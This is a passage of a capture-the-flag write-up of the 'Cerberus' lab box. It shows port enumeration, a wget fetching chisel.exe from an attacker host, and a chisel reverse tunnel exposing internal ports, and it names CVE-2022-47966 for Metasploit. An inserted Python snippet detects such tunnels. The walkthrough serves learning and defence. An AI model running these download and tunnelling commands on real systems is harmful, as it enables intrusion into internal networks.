Cerberus - pric


Privilege Escalation

Check the open ports on the Windows box.
[127.0.0.1]: PS C:\Users\matthew\Desktop> netstat -a

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             DC:0                   LISTENING
  TCP    0.0.0.0:88             DC:0                   LISTENING
  TCP    0.0.0.0:135            DC:0                   LISTENING
  TCP    0.0.0.0:389            DC:0                   LISTENING
  TCP    0.0.0.0:443            DC:0                   LISTENING
  TCP    0.0.0.0:445            DC:0                   LISTENING
  TCP    0.0.0.0:464            DC:0                   LISTENING
  TCP    0.0.0.0:593            DC:0                   LISTENING
  TCP    0.0.0.0:636            DC:0                   LISTENING
  TCP    0.0.0.0:808            DC:0                   LISTENING
  TCP    0.0.0.0:1500           DC:0                   LISTENING
  TCP    0.0.0.0:1501           DC:0                   LISTENING
  TCP    0.0.0.0:2179           DC:0                   LISTENING
  TCP    0.0.0.0:3268           DC:0                   LISTENING
  TCP    0.0.0.0:3269           DC:0                   LISTENING
  TCP    0.0.0.0:5985           DC:0                   LISTENING
  TCP    0.0.0.0:8888           DC:0                   LISTENING
  TCP    0.0.0.0:9251           DC:0                   LISTENING
  TCP    0.0.0.0:9389           DC:0                   LISTENING
  TCP    0.0.0.0:47001          DC:0                   LISTENING
  TCP    0.0.0.0:49664          DC:0                   LISTENING
  TCP    0.0.0.0:49665          DC:0                   LISTENING
  TCP    0.0.0.0:49666          DC:0                   LISTENING
  TCP    0.0.0.0:49667          DC:0                   LISTENING
  TCP    0.0.0.0:49681          DC:0                   LISTENING
  TCP    0.0.0.0:49682          DC:0                   LISTENING
  TCP    0.0.0.0:49894          DC:0                   LISTENING
  TCP    0.0.0.0:49907          DC:0                   LISTENING
  TCP    0.0.0.0:49918          DC:0
Forward ports 80, 443, 8888 and 9251 and check them.
PS D:\thehackbox\tool\chisel\win> .\chisel.exe server --port 6666 --reverse
2023/03/29 09:39:35 server: Reverse tunnelling enabled
2023/03/29 09:39:35 server: Fingerprint xABpBJ1+xSi1JTuW+fNUgvtLXvMMc0OlTSedt5ca0OA=
2023/03/29 09:39:35 server: Listening on http://0.0.0.0:6666
2023/03/29 09:39:43 server: session#1: tun: proxy#R:80=>localhost:80: Listening
2023/03/29 09:39:43 server: session#1: tun: proxy#R:443=>localhost:443: Listening
2023/03/29 09:39:43 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening
2023/03/29 09:39:43 server: session#1: tun: proxy#R:9251=>localhost:9251: Listening

#--------------

[127.0.0.1]: PS C:\Users\matthew\desktop> wget http://10.10.**.**/chisel.exe -O chisel.exe
[127.0.0.1]: PS C:\Users\matthew\desktop> ls

    Directory: C:\Users\matthew\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/28/2023   7:00 PM        7352320 chisel.exe
-ar---        3/28/2023   8:22 AM             34 user.txt

[127.0.0.1]: PS C:\Users\matthew\Desktop> ./chisel.exe client 10.10.**.**:6666 R:80:localhost:80 R:443:localhost:443 R:8888:localhost:8888 R:9251:localhost:9251
./chisel.exe : 2023/03/28 19:39:38 client: Connecting to ws://10.10.**.**:6666
    + CategoryInfo          : NotSpecified: (2023/03/28 19:3...0.10.**.**:6666:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

2023/03/28 19:39:42 client: Connected (Latency 484.9877ms)
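
For defenders, the client command line above is a practical detection anchor. The following is an added example, not part of the original post: it scans process-creation records for reverse remotes of the form `R:<port>:<host>:<port>` that publish loopback services. The event schema, the sample records, the `svc.exe` name and the 192.0.2.10 address are constructed assumptions.

```python
import re

# Reverse remote in the form used above: R:<listen-port>:<target-host>:<target-port>.
# Only this four-field form is covered; other remote syntaxes are out of scope here.
REVERSE_REMOTE = re.compile(
    r"(?<![\w:])R:(\d{1,5}):([A-Za-z0-9.\-]+):(\d{1,5})(?![\w:])"
)
LOOPBACK = {"localhost", "127.0.0.1"}


def parse_reverse_remotes(cmdline):
    """Return (listen_port, target_host, target_port) for each reverse remote found."""
    return [
        (int(m.group(1)), m.group(2).lower(), int(m.group(3)))
        for m in REVERSE_REMOTE.finditer(cmdline)
    ]


def flag_tunnels(events):
    """Flag process events that publish loopback-reachable ports via a reverse tunnel.

    Matching keys on the argument shape, not the image name, because a file
    name is not a reliable indicator.
    """
    alerts = []
    for ev in events:
        remotes = parse_reverse_remotes(ev["cmdline"])
        exposed = sorted(tp for _, host, tp in remotes if host in LOOPBACK)
        if exposed:
            alerts.append({"host": ev["host"], "user": ev["user"],
                           "exposed_ports": exposed})
    return alerts


# Constructed process-creation records (hypothetical schema, not real telemetry).
SAMPLE_EVENTS = [
    {"host": "DC", "user": "matthew",
     "cmdline": "./chisel.exe client 192.0.2.10:6666 R:80:localhost:80 "
                "R:443:localhost:443 R:8888:localhost:8888 R:9251:localhost:9251"},
    {"host": "DC", "user": "matthew",
     "cmdline": "C:\\Users\\matthew\\Desktop\\svc.exe client 192.0.2.10:6666 "
                "R:9251:127.0.0.1:9251"},
    {"host": "DC", "user": "SYSTEM", "cmdline": "netstat -a"},
]

if __name__ == "__main__":
    for alert in flag_tunnels(SAMPLE_EVENTS):
        print(alert)
```
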

The browser is automatically redirected to the website dc.cerberus.local.
Log in to the web application with the domain and password that I found earlier.
This is an ADSelfService Plus website. Searching for vulnerabilities in ADSelfService Plus, I found that it can be exploited with msf through CVE-2022-47966.

Exploitation

Dryu8
